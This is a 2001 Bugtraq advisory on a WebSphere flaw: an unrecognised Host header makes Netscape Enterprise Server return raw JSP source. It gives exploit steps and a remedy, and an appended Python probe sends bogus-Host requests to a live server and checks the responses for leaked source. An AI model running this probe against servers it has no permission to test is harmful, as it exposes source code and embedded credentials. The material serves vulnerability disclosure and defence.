[18830] in bugtraq


Yet Another IBM WebSphere Showcode Vulnerability

daemon@ATHENA.MIT.EDU (mhalls)
Fri Jan 26 13:15:12 2001

MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Message-ID:  <Pine.GSO.4.30.0101251408440.10870-100000@moench.nielsen.net>
Date:         Thu, 25 Jan 2001 15:13:33 -0800
Reply-To: mhalls <mhalls@NIELSEN.NET>
From: mhalls <mhalls@NIELSEN.NET>
To: BUGTRAQ@SECURITYFOCUS.COM

Summary:  When IBM WebSphere Application Server shares the same document
root as Netscape Enterprise Server, a malicious user can view the source
of any JSP file in that document root.

WebSphere's plugin for Netscape Enterprise Server uses the Host header
sent by the client browser to decide whether it should intercept a
request, matching the header against the list of "host aliases"
configured in WebSphere.  Sending a Host header value that WebSphere
does not expect bypasses the plugin, so Netscape Enterprise Server
delivers the JSP file as a regular static file, source included.

Exploit:  Add an entry to your hosts file mapping an arbitrary name to the
IP address of the server, then point your browser at
http://randomhostname/somejspfile.jsp.  If randomhostname is not in
WebSphere's list of host aliases, the file is served as a regular file
and the JSP source comes back.  The hosts-file entry only makes the
browser put that name in the Host header; any client that sets the Host
header directly gets the same result.
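The following is an added example, not part of the original advisory: a small probe that issues the same GET for a known JSP file twice, once with a Host header that is a configured WebSphere alias and once with a name that is not, and reports whether the second response contains raw JSP markup (`<%`, `<%@`, `<jsp:`).  The hostnames, the path `/index.jsp`, port 80 and the sample responses are all constructed assumptions; the `send` callable is injected so the comparison logic runs offline against canned responses as well as against a live server.

```python
"""Host-header bypass probe for a WebSphere / Netscape Enterprise Server pair.

Added example, not code from the advisory.  Assumes HTTP on port 80 and that
unprocessed JSP source is recognisable by its scriptlet/directive markers.
"""
import re
import socket
import sys

# Markers that should never appear in a *rendered* JSP response.
JSP_MARKERS = re.compile(rb"<%@|<%=|<%!|<%|<jsp:", re.IGNORECASE)


def build_request(host: str, path: str) -> bytes:
    """Raw HTTP/1.0 GET with an explicit Host header, which is exactly what a
    hosts-file alias makes the browser send."""
    return (f"GET {path} HTTP/1.0\r\n"
            f"Host: {host}\r\n"
            f"Connection: close\r\n\r\n").encode("ascii")


def split_response(raw: bytes):
    """Return (status_code, body) from a raw HTTP response."""
    head, _, body = raw.partition(b"\r\n\r\n")
    parts = head.split(b"\r\n", 1)[0].split()
    code = int(parts[1]) if len(parts) > 1 and parts[1].isdigit() else 0
    return code, body


def looks_like_jsp_source(body: bytes) -> bool:
    """True if the body still contains JSP tags, i.e. the file was served raw."""
    return JSP_MARKERS.search(body) is not None


def probe(send, path: str, known_alias: str, bogus_host: str) -> dict:
    """Fetch `path` with a configured alias and with an unknown Host.
    `send(request_bytes) -> response_bytes` is supplied by the caller.
    The server is flagged vulnerable only if the alias request comes back
    rendered while the bogus-Host request comes back as JSP source."""
    out = {}
    for label, host in (("alias", known_alias), ("bogus", bogus_host)):
        code, body = split_response(send(build_request(host, path)))
        out[label] = {"status": code, "source_leaked": looks_like_jsp_source(body)}
    out["vulnerable"] = (not out["alias"]["source_leaked"]) and out["bogus"]["source_leaked"]
    return out


def tcp_sender(ip: str, port: int = 80):
    """Real transport: one TCP connection per request, read until close."""
    def send(req: bytes) -> bytes:
        with socket.create_connection((ip, port), timeout=10) as s:
            s.sendall(req)
            chunks = []
            while True:
                c = s.recv(65536)
                if not c:
                    break
                chunks.append(c)
        return b"".join(chunks)
    return send


# Constructed sample responses (assumption) for offline demonstration:
# the alias request is rendered by WebSphere, the bogus one is served raw.
ALIAS_RESPONSE = (b"HTTP/1.0 200 OK\r\nContent-Type: text/html\r\n\r\n"
                  b"<html><body>Hello, world</body></html>")
BOGUS_RESPONSE = (b"HTTP/1.0 200 OK\r\nContent-Type: text/plain\r\n\r\n"
                  b"<%@ page import=\"java.sql.*\" %>\n"
                  b"<% String dbPassword = \"hunter2\"; %>\n<html>...")


def fake_sender(req: bytes) -> bytes:
    """Offline stand-in for the server: answers by Host header value."""
    host = re.search(rb"^Host: (.+)\r\n", req, re.MULTILINE).group(1)
    return ALIAS_RESPONSE if host == b"www.example.com" else BOGUS_RESPONSE


if __name__ == "__main__":
    if len(sys.argv) == 5:          # ip path known_alias bogus_host
        ip, path, alias, bogus = sys.argv[1:]
        print(probe(tcp_sender(ip), path, alias, bogus))
    else:                           # offline demo against constructed responses
        print(probe(fake_sender, "/index.jsp", "www.example.com", "notconfigured.invalid"))
```

The detection deliberately requires both halves: a 200 with JSP markup for the bogus host *and* a rendered page for the real alias.  A server that returns raw source for every Host value is broken in a different way (no plugin at all), and one that 404s the bogus host is not exposed to this particular bypass.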

Solution:  Change WebSphere's document root to a location other than the
Netscape Enterprise Server document root and move all JSP files there, so
the web server can no longer serve them as plain files.  There may be
other solutions.
